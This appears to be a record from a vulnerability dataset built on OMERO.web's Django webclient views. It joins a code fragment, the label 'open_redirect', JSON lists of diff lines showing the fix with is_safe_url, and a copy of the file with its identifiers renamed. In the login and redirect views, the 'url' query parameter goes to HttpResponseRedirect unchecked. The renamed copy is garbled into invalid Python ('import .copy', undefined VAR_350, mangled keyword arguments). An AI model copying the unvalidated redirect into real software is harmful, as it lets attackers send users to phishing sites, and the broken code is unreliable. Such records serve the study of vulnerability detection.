obj_ids.extend([i.id for i in fs.copyImages()])
obj_ids = list(set(obj_ids)) # remove duplicates
logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
jobId = str(handle)
request.session["callback"][jobId] = {
"job_type": "chgrp",
"group": group.getName(),
"to_group_id": group_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
# Update contains a list of images/containers that need to be
# updated.
project_ids = request.POST.get("Project", [])
dataset_ids = request.POST.get("Dataset", [])
image_ids = request.POST.get("Image", [])
screen_ids = request.POST.get("Screen", [])
plate_ids = request.POST.get("Plate", [])
if project_ids:
project_ids = [long(x) for x in project_ids.split(",")]
if dataset_ids:
dataset_ids = [long(x) for x in dataset_ids.split(",")]
if image_ids:
image_ids = [long(x) for x in image_ids.split(",")]
if screen_ids:
screen_ids = [long(x) for x in screen_ids.split(",")]
if plate_ids:
plate_ids = [long(x) for x in plate_ids.split(",")]
# TODO Change this user_id to be an experimenter_id in the request as it
# is possible that a user is chgrping data from another user so it is
# that users orphaned that will need updating. Or maybe all orphaned
# directories could potentially need updating?
# Create a list of objects that have been changed by this operation. This
# can be used by the client to visually update.
update = getAllObjects(
conn,
project_ids,
dataset_ids,
image_ids,
screen_ids,
plate_ids,
request.session.get("user_id"),
)
# return HttpResponse("OK")
return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
"""
Moves data to a new owner, using the chown queue.
Handles submission of chown form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, status=405)
# Get the target owner_id
owner_id = getIntOrDefault(request, "owner_id", None)
if owner_id is None:
return JsonResponse({"Error": "chown: No owner_id specified"})
owner_id = int(owner_id)
exp = conn.getObject("Experimenter", owner_id)
if exp is None:
return JsonResponse({"Error": "chown: Experimenter not found" % owner_id})
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
jobIds = []
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
handle = conn.chownObjects(dtype, obj_ids, owner_id)
jobId = str(handle)
jobIds.append(jobId)
request.session["callback"][jobId] = {
"job_type": "chown",
"owner": exp.getFullName(),
"to_owner_id": owner_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
"""
Runs a script using values in a POST
"""
scriptService = conn.getScriptService()
inputMap = {}
sId = long(scriptId)
try:
params = scriptService.getParams(sId)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
# Delegate to run_script() for handling 'No processor available'
rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
return JsonResponse(rsp)
else:
raise
params = scriptService.getParams(sId)
scriptName = params.name.replace("_", " ").replace(".py", "")
logger.debug("Script: run with request.POST: %s" % request.POST)
# upload new file
fileupload = (
"file_annotation" in request.FILES and request.FILES["file_annotation"] or None
)
fileAnnId = None
if fileupload is not None and fileupload != "":
manager = BaseContainer(conn)
fileAnnId = manager.createFileAnnotations(fileupload, [])
for key, param in params.inputs.items():
prototype = param.prototype
pclass = prototype.__class__
if key == "File_Annotation" and fileAnnId is not None:
inputMap[key] = pclass(str(fileAnnId))
continue
# handle bool separately, since unchecked checkbox will not be in
# request.POST
if pclass == omero.rtypes.RBoolI:
value = key in request.POST
inputMap[key] = pclass(value)
continue
if pclass.__name__ == "RMapI":
keyName = "%s_key0" % key
valueName = "%s_value0" % key
row = 0
paramMap = {}
while keyName in request.POST:
# the key and value don't have any data-type defined by
# scripts - just use string
k = str(request.POST[keyName])
v = request.POST[valueName]
if len(k) > 0 and len(v) > 0:
paramMap[str(k)] = v
row += 1
keyName = "%s_key%d" % (key, row)
valueName = "%s_value%d" % (key, row)
if len(paramMap) > 0:
inputMap[key] = wrap(paramMap)
continue
if key in request.POST:
if pclass == omero.rtypes.RListI:
values = request.POST.getlist(key)
if len(values) == 0:
continue
if len(values) == 1: # process comma-separated list
if len(values[0]) == 0:
continue
values = values[0].split(",")
# try to determine 'type' of values in our list
listClass = omero.rtypes.RStringI
pval = prototype.val # list
# check if a value type has been set (first item of prototype
# list)
if len(pval) > 0:
listClass = pval[0].__class__
if listClass == int(1).__class__:
listClass = omero.rtypes.rint
if listClass == long(1).__class__:
listClass = omero.rtypes.rlong
# construct our list, using appropriate 'type'
valueList = []
for v in values:
try:
# RStringI() will encode any unicode
obj = listClass(v.strip())
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, v))
continue
if isinstance(obj, omero.model.IObject):
valueList.append(omero.rtypes.robject(obj))
else:
valueList.append(obj)
inputMap[key] = omero.rtypes.rlist(valueList)
# Handle other rtypes: String, Long, Int etc.
else:
value = request.POST[key]
if len(value) == 0:
continue
try:
inputMap[key] = pclass(value)
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, value))
continue
# If we have objects specified via 'IDs' and 'DataType', try to pick
# correct group
if "IDs" in inputMap and "Data_Type" in inputMap:
gid = conn.SERVICE_OPTS.getOmeroGroup()
conn.SERVICE_OPTS.setOmeroGroup("-1")
try:
firstObj = conn.getObject(
inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
)
newGid = firstObj.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(newGid)
except Exception:
logger.debug(traceback.format_exc())
# if inputMap values not as expected or firstObj is None
conn.SERVICE_OPTS.setOmeroGroup(gid)
try:
# Try/except in case inputs are not serializable, e.g. unicode
logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
except Exception:
pass
rsp = run_script(request, conn, sId, inputMap, scriptName)
return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
"""Script upload UI"""
if request.method != "POST":
return {"template": "webclient/scripts/upload_script.html"}
# Get script path, name and text
script_path = request.POST.get("script_path")
script_file = request.FILES["script_file"]
script_file.seek(0)
script_text = script_file.read().decode("utf-8")
if not script_path.endswith("/"):
script_path = script_path + "/"
script_path = script_path + script_file.name
# If script exists, replace. Otherwise upload
scriptService = conn.getScriptService()
script_id = scriptService.getScriptID(script_path)
try:
if script_id > 0:
orig_file = OriginalFileI(script_id, False)
scriptService.editScript(orig_file, script_text)
message = "Script Replaced: %s" % script_file.name
else:
script_id = scriptService.uploadOfficialScript(script_path, script_text)
message = "Script Uploaded: %s" % script_file.name
except omero.ValidationException as ex:
message = str(ex)
return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
"""
Uses the scripting service (Batch Image Export script) to generate
OME-TIFF for an image and attach this as a file annotation to the image.
Script will show up in the 'Activities' for users to monitor and download
result etc.
"""
scriptService = conn.getScriptService()
sId = scriptService.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
image = conn.getObject("Image", imageId)
if image is not None:
gid = image.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
imageIds = [long(imageId)]
inputMap = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in imageIds]),
}
inputMap["Format"] = wrap("OME-TIFF")
rsp = run_script(request, conn, sId, inputMap, scriptName="Create OME-TIFF")
return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
"""
Starts running a script, adding details to the request.session so that it
shows up in the webclient Activities panel and results are available there
etc.
"""
request.session.modified = True
scriptService = conn.getScriptService()
try:
handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
# E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
jobId = str(handle)
status = "in progress"
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
}
request.session.modified = True
except Exception as x:
jobId = str(time()) # E.g. 1312803670.6076391
# handle python 2 or 3 errors
message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if message and message.startswith("No processor available"):
# omero.ResourceError
logger.info(traceback.format_exc())
error = "No Processor Available"
status = "no processor available"
message = "" # template displays message and link
else:
logger.error(traceback.format_exc())
error = traceback.format_exc()
status = "failed"
message = x.message
# save the error to http session, for display in 'Activities' window
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
"Message": message,
"error": error,
}
return {"status": status, "error": error}
return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
"""
Query to see if we have an OME-TIFF attached to the image (assume only 1,
since Batch Image Export will delete old ones)
"""
# Any existing OME-TIFF will appear in list
links = list(
conn.getAnnotationLinks(
"Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
)
)
rv = {}
if len(links) > 0:
# use highest ID === most recent
links.sort(key=lambda x: x.getId(), reverse=True)
annlink = links[0]
created = annlink.creationEventDate()
annId = annlink.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
download = reverse("download_annotation", args=[annId])
rv = {
"created": str(created),
"ago": ago(created),
"id": annId,
"download": download,
}
return rv # will get returned as json by default
| open_redirect | {
"code": [
"from .forms import ShareForm, BasketShareForm",
" elif action == \"add\":",
" template = \"webclient/public/share_form.html\"",
" experimenters = list(conn.getExperimenters())",
" experimenters.sort(key=lambda x: x.getOmeName().lower())",
" if o_type == \"share\":",
" img_ids = request.GET.getlist(\"image\", request.POST.getlist(\"image\"))",
" if request.method == \"GET\" and len(img_ids) == 0:",
" return HttpResponse(\"No images specified\")",
" images_to_share = list(conn.getObjects(\"Image\", img_ids))",
" if request.method == \"POST\":",
" form = BasketShareForm(",
" initial={\"experimenters\": experimenters, \"images\": images_to_share},",
" data=request.POST.copy(),",
" )",
" if form.is_valid():",
" images = form.cleaned_data[\"image\"]",
" message = form.cleaned_data[\"message\"]",
" expiration = form.cleaned_data[\"expiration\"]",
" members = form.cleaned_data[\"members\"]",
" enable = form.cleaned_data[\"enable\"]",
" host = \"%s?server=%i\" % (",
" request.build_absolute_uri(",
" reverse(\"load_template\", args=[\"public\"])",
" ),",
" int(conn.server_id),",
" )",
" shareId = manager.createShare(",
" host, images, message, members, enable, expiration",
" )",
" return HttpResponse(\"shareId:%s\" % shareId)",
" else:",
" initial = {",
" \"experimenters\": experimenters,",
" \"images\": images_to_share,",
" \"enable\": True,",
" \"selected\": request.GET.getlist(\"image\"),",
" }",
" form = BasketShareForm(initial=initial)",
" template = \"webclient/public/share_form.html\"",
" context = {\"manager\": manager, \"form\": form}"
],
"line_no": [
70,
2874,
2875,
2876,
2877,
2878,
2879,
2880,
2881,
2882,
2883,
2884,
2885,
2886,
2887,
2888,
2889,
2890,
2891,
2892,
2894,
2895,
2896,
2897,
2898,
2899,
2900,
2901,
2902,
2903,
2904,
2905,
2906,
2907,
2908,
2909,
2910,
2911,
2912,
2913,
2914
]
} | {
"code": [
"from .forms import ShareForm",
" \"\"\"",
" If url is a different host, not in settings.REDIRECT_ALLOWED_HOSTS",
" we return webclient index URL.",
" \"\"\"",
" if not is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):",
" return url",
" else:",
" url = validate_redirect_url(url)",
" url = validate_redirect_url(url)"
],
"line_no": [
71,
181,
183,
184,
185,
186,
188,
272,
273,
352
]
} |
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm, BasketShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
import .long
except ImportError:
VAR_241 = int
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
VAR_51 = None
VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
if VAR_52 is not None:
VAR_51 = VAR_241(VAR_52)
return VAR_51
def FUNC_1(VAR_2, VAR_3):
VAR_51 = VAR_2.GET.getlist(VAR_3)
return [VAR_318 for VAR_318 in VAR_51 if VAR_318 != ""]
def FUNC_2(VAR_2, VAR_3):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
@never_cache
@render_response()
def FUNC_4(VAR_2, VAR_5=None, **VAR_6):
VAR_53 = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
VAR_53["template"] = settings.INDEX_TEMPLATE
except Exception:
VAR_53["template"] = "webclient/VAR_93.html"
VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
VAR_53["template"] = "webclient/VAR_93.html"
return VAR_53
class CLASS_0(LoginView):
VAR_54 = "webclient/login.html"
VAR_55 = "OMERO.web"
def FUNC_80(self, VAR_2):
return self.handle_not_logged_in(VAR_2)
def FUNC_81(self, VAR_2, VAR_5, VAR_56):
if VAR_2.session.get("active_group"):
if (
VAR_2.session.get("active_group")
not in VAR_5.getEventContext().memberOfGroups
):
del VAR_2.session["active_group"]
if VAR_2.session.get("user_id"):
del VAR_2.session["user_id"]
if VAR_2.session.get("server_settings"):
del VAR_2.session["server_settings"]
if VAR_2.POST.get("noredirect"):
return HttpResponse("OK")
VAR_7 = VAR_2.GET.get("url")
if VAR_7 is None or len(VAR_7) == 0:
try:
VAR_7 = parse_url(settings.LOGIN_REDIRECT)
except Exception:
VAR_7 = VAR_350("webindex")
return HttpResponseRedirect(VAR_7)
def FUNC_82(self, VAR_2, VAR_57=None, VAR_22=None):
if VAR_22 is None:
VAR_337 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
if VAR_337 is not None:
VAR_115 = {"server": unicode(VAR_337)}
VAR_22 = LoginForm(VAR_115=initial)
else:
VAR_22 = LoginForm()
VAR_53 = {
"version": omero_version,
"build_year": build_year,
"error": VAR_57,
"form": VAR_22,
}
VAR_7 = VAR_2.GET.get("url")
if VAR_7 is not None and len(VAR_7) != 0:
VAR_53["url"] = urlencode({"url": VAR_7})
if hasattr(settings, "LOGIN_LOGO"):
VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
VAR_338 = VAR_350("webindex")
if settings.PUBLIC_URL_FILTER.search(VAR_338):
VAR_53["public_enabled"] = True
VAR_53["public_login_redirect"] = VAR_338
VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
VAR_339 = re.match(
(
r"(?P<major>\VAR_362+)\."
r"(?P<minor>\VAR_362+)\."
r"(?P<patch>\VAR_362+\.?)?"
r"(?P<dev>(dev|a|b|rc)\VAR_362+)?.*"
),
omero_version,
)
VAR_340 = "^VAR_416%s\\.%s\\.[^-]+$" % (
VAR_339.group("major"),
VAR_339.group("minor"),
)
VAR_53["client_download_tag_re"] = VAR_340
VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(VAR_2, self.template, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_5(VAR_2, VAR_5=None, **VAR_6):
return HttpResponse("OK")
@login_required()
def FUNC_6(VAR_2, VAR_5=None, VAR_7=None, **VAR_6):
FUNC_7(VAR_2)
VAR_7 = VAR_7 or VAR_350("webindex")
return HttpResponseRedirect(VAR_7)
def FUNC_7(VAR_2, VAR_8=None):
if VAR_8 is None:
VAR_8 = VAR_2.GET.get("active_group")
VAR_8 = int(VAR_8)
if (
"active_group" not in VAR_2.session
or VAR_8 != VAR_2.session["active_group"]
):
VAR_2.session.modified = True
VAR_2.session["active_group"] = VAR_8
def FUNC_8(VAR_2, VAR_9="All members"):
VAR_58 = (
VAR_2.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", VAR_9)
)
return {
"id": -1,
"omeName": VAR_58,
"firstName": VAR_58,
"lastName": "",
}
@login_required(login_redirect="webindex")
def FUNC_9(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method == "POST":
try:
try:
VAR_5.close()
except Exception:
VAR_0.error("Exception during FUNC_9.", exc_info=True)
finally:
VAR_2.session.flush()
return HttpResponseRedirect(VAR_350(settings.LOGIN_VIEW))
else:
VAR_53 = {"url": VAR_350("weblogout"), "submit": "Do you want to log out?"}
VAR_54 = "webgateway/base/includes/post_form.html"
return render(VAR_2, VAR_54, VAR_53)
def FUNC_10(VAR_2, VAR_10, VAR_5=None, VAR_7=None, **VAR_6):
VAR_2.session.modified = True
VAR_54 = VAR_6.get("template", None)
if VAR_54 is None:
if VAR_10 == "userdata":
VAR_54 = "webclient/VAR_158/containers.html"
elif VAR_10 == "usertags":
VAR_54 = "webclient/VAR_158/containers.html"
else:
VAR_54 = "webclient/%s/%s.html" % (VAR_10, menu)
VAR_59 = VAR_6.get("show", Show(VAR_5, VAR_2, VAR_10))
try:
VAR_242 = VAR_59.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
VAR_60 = VAR_59.initially_open_owner
if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == VAR_5.getUser().getOmeName()
):
return HttpResponseRedirect("%s?VAR_7=%s" % (VAR_350("weblogin"), VAR_7))
if VAR_242 is not None:
FUNC_7(VAR_2, VAR_242.details.group.id.val)
VAR_61 = {}
VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
if VAR_10 == "search":
if VAR_62.is_valid():
VAR_61["query"] = VAR_62.cleaned_data["search_query"]
VAR_7 = VAR_6.get("load_template_url", None)
if VAR_7 is None:
VAR_7 = VAR_350(viewname="load_template", args=[VAR_10])
VAR_8 = VAR_2.session.get("active_group") or VAR_5.getEventContext().groupId
VAR_63, VAR_64 = VAR_5.getObject("ExperimenterGroup", VAR_8).groupSummary()
VAR_65 = [u.id for u in VAR_63]
VAR_65.extend([u.id for u in VAR_64])
VAR_66 = VAR_2.GET.get("experimenter")
if VAR_60 is not None:
if VAR_2.session.get("user_id", None) != -1:
VAR_66 = VAR_60
try:
VAR_66 = VAR_241(VAR_66)
except Exception:
VAR_66 = None
if VAR_66 is not None:
if (
VAR_66
not in (
set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
)
and VAR_66 != -1
):
VAR_66 = None
if VAR_66 is None:
VAR_66 = VAR_2.session.get("user_id", None)
if VAR_66 is None or int(VAR_66) not in VAR_65:
if VAR_66 != -1: # All VAR_166 in VAR_101 is allowed
VAR_66 = VAR_5.getEventContext().userId
VAR_2.session["user_id"] = VAR_66
VAR_67 = list(VAR_5.getGroupsMemberOf())
VAR_67.sort(VAR_310=lambda x: x.getName().lower())
VAR_68 = VAR_67
VAR_69 = ContainerForm()
VAR_70 = {}
if VAR_10 == "search":
for g in VAR_68:
g.loadLeadersAndMembers()
for VAR_383 in g.leaders + g.colleagues:
VAR_70[VAR_383.id] = VAR_383
VAR_70 = list(VAR_70.values())
VAR_70.sort(VAR_310=lambda x: x.getLastName().lower())
VAR_53 = {
"menu": VAR_10,
"init": VAR_61,
"myGroups": VAR_67,
"new_container_form": VAR_69,
"global_search_form": VAR_62,
}
VAR_53["groups"] = VAR_68
VAR_53["myColleagues"] = VAR_70
VAR_53["active_group"] = VAR_5.getObject("ExperimenterGroup", VAR_241(VAR_8))
VAR_53["active_user"] = VAR_5.getObject("Experimenter", VAR_241(VAR_66))
VAR_53["initially_select"] = VAR_59.initially_select
VAR_53["initially_open"] = VAR_59.initially_open
VAR_53["isLeader"] = VAR_5.isLeader()
VAR_53["current_url"] = VAR_7
VAR_53["page_size"] = settings.PAGE
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_53["current_admin_privileges"] = VAR_5.getCurrentAdminPrivileges()
VAR_53["leader_of_groups"] = VAR_5.getEventContext().leaderOfGroups
return VAR_53
@login_required()
@render_response()
def FUNC_11(VAR_2, VAR_10, VAR_5=None, VAR_7=None, **VAR_6):
return FUNC_10(VAR_2=request, VAR_10=menu, VAR_5=conn, VAR_7=url, **VAR_6)
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_7=None, VAR_5=None, **VAR_6):
VAR_67 = list(VAR_5.getGroupsMemberOf())
VAR_67.sort(VAR_310=lambda x: x.getName().lower())
if VAR_5.isAdmin(): # Admin can see all VAR_68
VAR_243 = [
VAR_5.getAdminService().getSecurityRoles().userGroupId,
VAR_5.getAdminService().getSecurityRoles().guestGroupId,
]
VAR_68 = VAR_5.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
VAR_68.sort(VAR_310=lambda x: x.getName().lower())
else:
VAR_68 = VAR_67
for g in VAR_68:
g.loadLeadersAndMembers() # load VAR_63 / VAR_64
VAR_53 = {
"template": "webclient/base/includes/FUNC_12.html",
"current_url": VAR_7,
"groups": VAR_68,
"myGroups": VAR_67,
}
return VAR_53
@login_required()
def FUNC_13(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_68 = tree.marshal_groups(
VAR_5=conn, VAR_244=member_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_14(VAR_2, VAR_11, VAR_5=None, **VAR_6):
try:
VAR_11 = VAR_241(VAR_11)
except ValueError:
return HttpResponseBadRequest("Invalid VAR_341 id")
try:
if VAR_11 < 0:
VAR_341 = FUNC_8(VAR_2)
else:
VAR_341 = tree.marshal_experimenter(
VAR_5=conn, VAR_11=experimenter_id
)
if VAR_341 is None:
raise Http404("No Experimenter found with ID %s" % VAR_11)
return JsonResponse({"experimenter": VAR_341})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def FUNC_15(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_11 = FUNC_0(VAR_2, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_71 = dict()
try:
VAR_71["projects"] = tree.marshal_projects(
VAR_5=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["datasets"] = tree.marshal_datasets(
VAR_5=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["screens"] = tree.marshal_screens(
VAR_5=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["plates"] = tree.marshal_plates(
VAR_5=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
try:
VAR_342 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
VAR_342 = {"enabled": True}
if (
VAR_5.isAdmin()
or VAR_5.isLeader(VAR_335=VAR_2.session.get("active_group"))
or VAR_11 == VAR_5.getUserId()
or VAR_342.get("enabled", True)
):
VAR_247 = tree.marshal_orphaned(
VAR_5=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_247["name"] = VAR_342.get("name", "Orphaned Images")
VAR_71["orphaned"] = VAR_247
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_71)
@login_required()
def FUNC_16(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_245 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_107 = tree.marshal_datasets(
VAR_5=conn, VAR_245=project_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_17(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_246 = FUNC_0(VAR_2, "id", None)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_25 = "share_id" in VAR_6 and VAR_241(VAR_6["share_id"]) or None
try:
VAR_106 = tree.marshal_images(
VAR_5=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_246=dataset_id,
VAR_25=share_id,
VAR_248=load_pixels,
VAR_20=group_id,
VAR_87=page,
VAR_250=date,
VAR_249=thumb_version,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_18(VAR_2, VAR_5=None, **VAR_6):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_251 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_5.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_110 = tree.marshal_plates(
